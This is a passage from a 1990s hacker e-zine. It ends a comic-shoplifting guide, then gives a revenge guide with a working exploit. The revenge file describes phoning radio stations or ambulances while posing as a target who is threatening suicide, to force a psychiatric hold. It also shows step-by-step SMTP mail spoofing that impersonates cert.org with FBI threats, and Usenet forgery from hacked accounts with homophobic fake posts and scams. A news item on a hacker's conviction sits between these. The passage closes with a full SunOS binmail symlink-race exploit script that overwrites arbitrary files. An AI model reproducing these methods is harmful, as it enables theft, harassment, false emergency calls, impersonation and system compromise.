so they don't get suspicious. For those of you who collect comics: a perfect comic to do this with is the Vampire Lestat #1. Conventions can be handled somewhat the same way as stores, but there are usually more people watching you at all times at a convention, so it can be much harder. An essential at a convention is a bookbag and/or a binder. The best thing to do at a convention is to look at the boxes that the dealers have set up under the table; the larger dealers usually keep the stuff they couldn't fit on their table under the table. While under the table, keep your bag right next to you, OPEN. Take out some comics that you'd like out of the box along with some others, proceed to look at some, then put some down next to the opening of your bag, and when no one is looking casually, but quickly, slip them into your bag. But using methods like those above work too, especially putting comics in a bag with other comics and buying just one (with the others in the bag). You can find conventions by looking in comic book price guides or magazines(Wizard, Comics Vaules Monthly, Comic Books Buyers Guide, etc), in a section entitled 'Conventions!'' or something self-explanatory like that. ===- There are more methods than I've described above, but some were little complicated, some too simple, some just variations on stuff above and some i just didn't feel like putting in. Again, if you don't collect, I suggest starting a little before trying any of this, just so you have the general feel of being at a store and/or a convention; and also cuz its fun. For those of you who do collect, be careful and not too greedy. If you have any other ways to get comics, problems with what I wrote, questions, etc, please leave me mail or talk to me on IRC or something like that. Cya l8r.... kid Eternity - eternity@phantom.com ... ================================[MiNDCRiME]================================ [FiLE #9:] Getting Even The Sequel Your Momma Warned You About. by h0wcum Revenge is an art. Cristian belief is to forgive one another, but my persoanl belive is to make the fuxers pay for even the smallest mistake. The mistake being fuxing with you. Life is short, unfair and painfull and I don't have time to waste getting fucked with. So, to make life a little more interesting, I sit around conceiving and implementing revenge tactics. Your anger must fuel you. It it the primary driving force in seeking revenge. The anger must come from severe intolerance of getting fucked with. I will discuss a few more revenge tactics in this edition. I'd like to point out that some are illegal, and some are not. Wether or not they are illegal, the do not make a good story to tell a cop, so watch your ass and don't get busted. I will not be resposible for your implementation or failure to implement these tactics. Most of these tactics I will discuss require knowing your mark's name and possibly his or her address. "They're Coming to Take Me Away!" This tactic definately requires knowing your mark's name and address, or atleast his name. The first time I pulled this one off, I did it from half way across the country. It's great for laughs and it will really ruin your mark's day. Find the name of a radio station local to your mark. This isn't really hard. Find someone in the area to tell you or get it out of directory assistance, or you can order a set of yellow pages for your mark's area. (always a good idea as it comes in handy. I have about 10 foreign phone books.). Call that radio station at night, but when you expect your mark to be awake. You will pretend to be your mark. Act really upset and paranoid and threaten suicide. BE CONVINCING! Talk of how the world is against you and you have a gun pointed to your head, or better yet, say you popped a huge ammount of pills and time is running out on you. Use your imagination. If you are certain your mark is not listed in the phone book, reluctantly give him your address (yes, he will ask repeatedly). Atleast give him your name. He will call an ambulance on the other line while you talk. It is especially usefull to use the pill method here because if the EMT's think you are dying, they will be more forcefull in hauling your mark away. If all goes well, the EMT's will be hauling your mark away to the local mental hospital for a 24 hour stay of observation. This is required by law in some areas. Of course your mark is going to deny it, but the doctors will expect that, and it will keep him in longer if he does in fact get taken. The worst case scenario here is that the ambulance shows up, and leaves without him. Even if that happens, you can rest assured he will not be very happy. Suicide threats to radio stations are taken very seriously, so it is probable the EMT's will aguire your mark no matter how much he denies being suicidal. When I tried this, mr. mark was away for 2 days. (I sent him flowers) A variation of this tactic would be to call the ambulance and skip the radio station. You can make up any medical situation, or you can be suicidal to them. If you do, act really out of it, keep forgetting things and being contradictory. Make them think you can't remeber from one minute to the next. That way, they won't believe your mark when he claims not to be suicidal. neighbors get a kick out of watching ambulances. PART B: Supplimental Toolz: Fake mail and fake news. Now before you kiddies get going on this, I know this is old shit. I know it's been done before and I am merely posting it for the less informed, so spank me. Just about every system on the net has a mail daemon running, the process which handles incoming and out going mail. You can usually connect to these daemons (on just about any system) by telnetting to port 25 of that system. Ex: telnet buttfuck.com 25 I'll show you a sample session. Lines beginning with are what you would type (duh). 220 gold.tc.umn.edu (Mail*Hub TurboSendmail) Service ready helo root@cert.org 250 gold.tc.umn.edu G'day MATH1.CIMS.NYU.EDU! Why do you call yourself root@cert.org? mail from: root@cert.org 250 root@cert.org... Sender ok rcpt to: h0wcum@cyberspace.net 250 h0wcum@cyberspace.net... Recipient ok data 354 Enter mail, end with "." on a line by itself To: h0wcum@cyberspace.net Subject: repeated breakin attempts. This is an automatic warning generated by a security daemon. Warning is hereby given to you that unless you cease from your unlawful activities on the network, criminal charges will be sought against you. This is your final warning. The FBI has been notified of your activities. You need not reply to this, but should you have any questions, you may call us directly with this reference number: Q3-23-A. Have a nice day. BITCH! . 250 Message received and queued quit 221 Until later buttfuck.com Now this isn't totaly untraceable. If any of you know of an untracable STMP site, please let me know. The recipient will get the following (shown with full headers, your mail viewer may not show them all but they are there, just the same). From root@cert.org Mon Dec 12 02:22:26 1994 Return-Path: Received: from my.fake.mail.com victim.com (4.1/SMI-4.1) id AA22748; Mon, 12 Dec 94 02:21:23 PST Received: from buttfuck.com by my.fake.mail.edu; Mon, 12 Dec 94 04:18:54 -0500 To: j00@victim.com Subject: repeated breakin attempts. Message-Id: <2eec2399487d002@my.fake.mail.edu> Date: Mon, 12 Dec 94 04:19:05 -0500 From: root@cert.org Status: RO X-Status: This is an automatic warning generated by a security daemon. Warning is hereby given to you that unless you cease from your unlawful activities on the network, criminal charges will be sought against you. This is your final warning. The FBI has been notified of your activities. You need not reply to this, but should you have any questions, you may call us directly with this reference number: Q3-23-A. Have a nice day. BITCH! --------------------- I embellished a little. my.fake.mail.edu is the mail server you used, victim.com is your mark's address and buttfuck.com is you. Still, unless someone points out a better way, there is no way to get rid of this: Received: from buttfuck.com by my.fake.mail.edu; Mon, 12 Dec 94 04:18:54 -0500 So, if you can, telnet to somewhere else before telnetting you your fake mail server. FAKE NEWS Fake news rox. I allways post fake news to the gay areas of usenet. You can either post to gay areas, post to alt.test to get your mark about 1000 automatic replies, or cross post wildly to groups that have nothing to do with what you are posting about so that every Mr. Butt-cheese will write your mark (and his postmaster which could get him kicked if enough complaints come in) bitching of an inapropriate cross-post. You can't telnet to just any NNTP server and post. You can usually only do it from a host in the NNTP's domain. So use a hacked account for this. Some sites use a seperate news server in their domain for news. If you can't find the site, type tin -r and watch for "Connecting to news.masterbation.com" (or whatever) to find the host then telnet to that site. You will be using port 119, folks, and if any1 knows an anonymous access NNTP server, lemmie know. Here's an example: 200 bondage.buttfuck.com InterNetNews NNRP server INN 1.4 20-Mar-93 ready (posting ok). group alt.homosexual 211 171 32393 32563 alt.homosexual post 340 Ok Newsgroups: alt.homosexual <--- separate by commas. 1 must match From: solctice@iia.org ^your "group" command Organization: Idiots Is Awesom <-- anything here Distributions: world <-- a must Subject: GWM in need of companion. Hello all! I'm looking for a nice single gentleman in the NJ area to get together with. I'm sorta lonely so if you'd like to meet email me! -Jim (not really necessary) . 240 Article posted quit 205 Connection closed by foreign host. The message will show up on usenet within about 20 mins. Here's what it will look like: From bondage.buttfuck.com!news Mon Dec 12 05:03:45 1994 Path: bondage.buttfuck.com!news From: solctice@iia.org Newsgroups: alt.homosexual Subject: GWM in need of companion. Date: 12 Dec 1994 09:59:03 GMT Organization: Idiots Is Awesom Lines: 5 Message-ID: <3ch6t7$2kn@bondage.buttfuck.com> NNTP-Posting-Host: sodomy.buttfuck.com <--unavoidable unless you post from the site of your mark. Distribution: world Hello all! I'm looking for a nice single gentleman in the NJ area to get together with. I'm sorta lonely so if you'd like to meet email me! -Jim bondage is the NNTP server and sodomy is the host you posted from so be sure to use a hacked acct. Like I said most of this is common knowlege to all hackers. The trick here is most effective use out of it. Use your imagination. People get really pissed on UseNet. Time Magazine recently wrote an article on UseNet and how people who cross post get thousands of nasty replies. One good use of this is to incorporate the "Make Money Fast" scam into this and cross-post to every group from your mark. Time said a lot off ppl got pissed, a lot. So do it up. Remeber, if you're gonna get revenge, don't do it with sticks and stones, do it nuclear. -h0wcum JUST IN: (old news, but I just found it) These are NNTP servers which you can telnet to from anywhere: This list was compiled by Matthew Ghio (ghio@myriad.pc.cc.cmu.edu). [Edited by me to remove no posting and non workable sites] ccvax.ucd.ie myriad.pc.cc.cmu.edu news.c2.org news.cis.nctu.edu.tw news.csie.nctu.edu.tw news.usafa.af.mil [u try it, not me :) ] ================================[MiNDCRiME]================================ [File #10:] [Courtesy of Rerror] These are two articles about John Falcon's arrest that appeared in the Anchorage Daily News in Alaska: Police Report Hacker accused of computer fraud A 20-year-old Anchorage man has been charged with four counts related to computer fraud. Donald Max Fanning is accused of breaking into a computer system at a Seattle-based company and illegally charging phone calls to the Federal Aviation Administration and MarkAir. The charges also allege that Fanning stole property from Elmendorf Air Force Base and illegally obtained a password that could have allowed him to break into a government computer. Fanning is scheduled to be arraigned in U.S. District Court today. Daily News staff report Hacker gets 20-month sentence By S.J. Komarnitsky Daily News Reporter An Anchorage man convicted of computer hacking has been sentenced to 20 months in federal prison. Donald Max Fanning was also ordered to pay $21,000 in restitution and perform 200 hours of community service. Fanning, 20, pleaded guilty in June to two counts of computer fraud, one count of fradulant use of an access device, and theft of U.S. government property. Assistant U.S. Attorney Jim Torgerson said the charged included stealing computer equipment from Elmendorf Air Force Base, illegally charging more than $1,700 in long-distance calls to the Federal Aviation Administration and MarkAir, and breaking into a Seattle-based computer company. (Typist: I know this to be Tera Computer) Fanning also posted the code he used to charge calls to the FAA on a voice-mail system. Torgerson said Wednesday that most of the money - about $14,000 - would go to the Air Force to cover the cost of the stolen equipment. An additional $4,800 would go to the Seattle company to repay its costs in tracking Fanning down, while the remainder would be given to the FAA and MArkAir to pay for the phone calls. Fanning will be on probation for three years following his release. As part of his sentence, he will not be allowed to own or use any computer during that time. -- You can E-Mail him at jfalcon@ice-bbs.alaska.net ... I will print out and send anything sent here to him in prison. Responses will be E-Mailed back. ================================[MiNDCRiME]================================ ================================[MiNDCRiME]================================ [ File #11:] [ I was told this was *thee* absolute latest sendmail script. If I am wrong, spank me, cuz not only do I not give a flying fuck, but there are so many sendmail exploits, it makes my head spin and I do not even try to keep up with all of them. -hC ] #!/bin/sh # tmpmail: overwrite files using binmail # # Usage: tmpmail to-file # # [8lgm], tested under SunOS 4.1.2. # # Definitely NOT for distribution, please do not use for cracking purposes! # This script is only to be provided to trusted users, due to poor # workaround chances. # # Note: Script only works if mail is suid root. # Other vendors may use tmpnam("ma"). # # This vulnerability can be exploited for sgid # mail binmails, the only modification would # be to predict the pid of the mail process # created by sendmail. This would be 4 forward # of the current pid - assuming a 'quiet' system. # # Will create to-file, or truncate. PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" # Check args if [ $# -ne 1 ]; then echo "Syntax: $PROG to-file" exit 1 fi TO_FILE="$1" # Create our racing program! cat > mailrace.c << 'EOF' #include #include char path[] = "/tmp/maaXXXX"; main(argc,argv) int argc; char **argv; { int pid; char *trv; if (argc != 3) { fprintf(stderr, "Usage: %s pid tofile\n", argv[0]); exit(1); } pid = atoi(argv[1]); /* Stolen from mktemp.c */ for (trv = path; *trv; ++trv); /* extra X's get set to 0's */ while (*--trv == 'X') { *trv = (pid % 10) + '0'; pid /= 10; } symlink("/tmp/ShortSong", path); while(symlink(argv[2], path)); unlink("/tmp/ShortSong"); exit(0); } EOF cc -o mailrace mailrace.c # Check we now have mailrace if [ ! -x "mailrace" ]; then echo "$PROG: couldnt compile mailrace.c - check it out" exit 1 fi # create some input for binmail echo localhost $USER > /tmp/BlueRoom.$$ ./mailrace $$ $TO_FILE & exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$ ================================[MiNDCRiME]================================